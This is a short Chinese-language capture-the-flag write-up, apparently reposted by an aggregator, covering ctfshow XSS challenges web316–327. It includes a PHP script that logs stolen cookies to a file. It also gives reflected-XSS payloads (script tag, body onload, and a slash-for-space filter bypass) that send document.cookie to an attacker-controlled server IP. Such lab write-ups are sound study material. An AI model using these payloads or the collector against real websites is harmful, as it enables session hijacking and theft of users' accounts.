ctfshow_xss_wp
source link: https://charmersix.icu/2022/05/14/ctfshow_xss_wp/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
跨站脚本攻击在这一套题目中体现的淋漓尽致。
web316
跨站脚本攻击,现时跨站,这里我用的自己的服务器,当然也有用各种xss网站的,
都差不多,比如http://xsscom.com/加载的还比较快。
我用的自己服务器,贴上一个这个脚本
<?php
$cookie = $_GET['1'];
$log = fopen("flag.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
我这里建议文件名不要用xss,因为我刚开始用的xss,后边会有题目把xss过滤了。
payload:
<script>window.location.href='http://自己服务器IP/a.php?1='+document.cookie</script>
window.location.href
可以理解成是,跳转到href里,具体参考https://www.cnblogs.com/Qian123/p/5345298.html#_label3
document.cookie
就是创建一个cookie,这里是把目标cookie窃取下来,具体参考https://www.runoob.com/jsref/prop-doc-cookie.html
web317-319
这里属于是一招鲜吃遍天了,这里过滤的东西都不一样,有img,script,xss
但是payload:
<body onload="document.location.href='http://IP/a.php?1='+document.cookie"></body>
web320-web326
过滤了空格,但是tab或者/或者/**/都可以用
所以payload:
<body/onload="document.location.href='http://ip/a.php?1='+document.cookie"></body>
web327
开始来到存储型XSS,难度起来了。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK